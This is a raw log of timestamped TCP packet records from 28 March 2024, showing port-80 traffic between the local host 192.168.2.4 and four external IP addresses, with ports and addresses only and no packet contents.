Mar 28, 2024 09:14:59.271779060 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.271812916 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.272500038 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.272511959 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.272578001 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.272589922 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.272602081 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.272618055 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.272618055 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.272659063 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.272670984 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.272691011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.272691011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.273025036 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.273596048 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.273607969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.273638964 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.273657084 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.273679972 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.273691893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.273706913 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.273768902 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.273808956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.273910999 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.273968935 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.273968935 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.274420977 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.274435043 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.274471998 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.274494886 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.274523973 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.274566889 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.275001049 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275012970 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275125980 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275135994 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275139093 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275182009 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275182009 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275192022 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275204897 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275247097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275316954 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275340080 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275373936 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275402069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275417089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275418043 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275455952 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275484085 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275492907 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275492907 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275520086 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275563955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275604010 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.275669098 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.275881052 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.276209116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.276241064 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.276274920 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.276309013 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.276309013 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.276351929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.276365042 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.276376009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.276412964 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.276420116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.276458025 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.276458025 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.277410030 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.277507067 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.277739048 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.277751923 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.277762890 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.277775049 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.277817011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.277817011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.277841091 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.277853012 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.277884960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.277901888 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.277901888 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.277920961 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.279181957 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.279205084 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.279232025 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.279247999 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.281390905 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281415939 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281429052 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281444073 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281461000 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.281475067 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281486988 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281517029 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.281517029 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.281533003 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281867027 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.281877041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281892061 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281925917 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.281929970 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281940937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281976938 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.281979084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.281980038 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.282011986 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.282013893 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.282040119 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.282090902 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.282090902 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.282888889 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.282912970 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.282924891 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.282960892 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.282962084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.282983065 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.282994032 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.283005953 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.283019066 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.283047915 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.283047915 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.283080101 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.284023046 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284040928 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284055948 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284066916 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284079075 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284105062 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.284105062 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.284115076 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284127951 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284161091 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.284161091 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.284643888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284661055 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284728050 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.284728050 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.284734011 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284745932 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284776926 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284789085 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284811020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.284823895 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.284823895 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.284868002 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.285600901 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.285629034 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.285674095 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.285674095 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.285696983 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.285737038 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.285744905 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.285757065 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.285787106 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.285805941 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.285830021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.285845041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.285950899 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.286575079 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.286657095 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.286668062 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.286705971 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.286710024 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.286710024 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.286717892 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.286753893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.286772013 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.286783934 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.286796093 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.286815882 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.286815882 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.286883116 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.287592888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.287605047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.287616968 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.287628889 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.287679911 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.287679911 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.287688017 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.287698984 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.287738085 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.287759066 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.287801027 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.288620949 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.288633108 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.288666010 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.288693905 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.288706064 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.288717985 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.288728952 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.288738966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.288738966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.288789988 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.288815022 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.288856983 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.289022923 CET	80	49762	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.289083004 CET	49762	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.289135933 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.289148092 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.289181948 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.289205074 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.289427996 CET	49762	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.289443016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.289496899 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.289509058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.289534092 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.289534092 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.289541960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.289577007 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.289577007 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.289589882 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.289602041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.289638996 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.290420055 CET	80	49750	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.290810108 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.290828943 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.290857077 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.290868044 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.290877104 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.290884018 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.290896893 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.290909052 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.290937901 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.290952921 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.290963888 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.290970087 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.290997028 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291006088 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291018963 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291029930 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291049957 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291064024 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291070938 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291095972 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291100025 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291114092 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291143894 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291182995 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291194916 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291227102 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291261911 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291273117 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291290998 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291296959 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291332960 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291347027 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291358948 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291371107 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291378975 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291410923 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291413069 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291424036 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291445017 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291469097 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291477919 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291495085 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291507006 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291527987 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291538954 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291558981 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291583061 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291588068 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291619062 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291619062 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291678905 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291718006 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291723967 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291769028 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291785002 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291789055 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291824102 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291827917 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291867971 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291893959 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291901112 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291917086 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291932106 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291941881 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291963100 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.291965961 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.291985989 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292007923 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292031050 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292057991 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292069912 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292109013 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292121887 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292157888 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292157888 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292198896 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292202950 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292249918 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292284966 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292293072 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292304993 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292346001 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292350054 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292368889 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292380095 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292387962 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292409897 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292416096 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292438030 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292438984 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292457104 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292474985 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292484045 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292486906 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292521954 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292562008 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292582035 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292593002 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292597055 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292625904 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292628050 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292638063 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292649031 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292660952 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292681932 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292687893 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292699099 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292721987 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292736053 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292752981 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292772055 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292777061 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292788029 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292831898 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292854071 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292872906 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292896032 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292912960 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292921066 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292936087 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.292946100 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.292969942 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.293042898 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.293055058 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.293066025 CET	80	49737	185.172.128.6	192.168.2.4
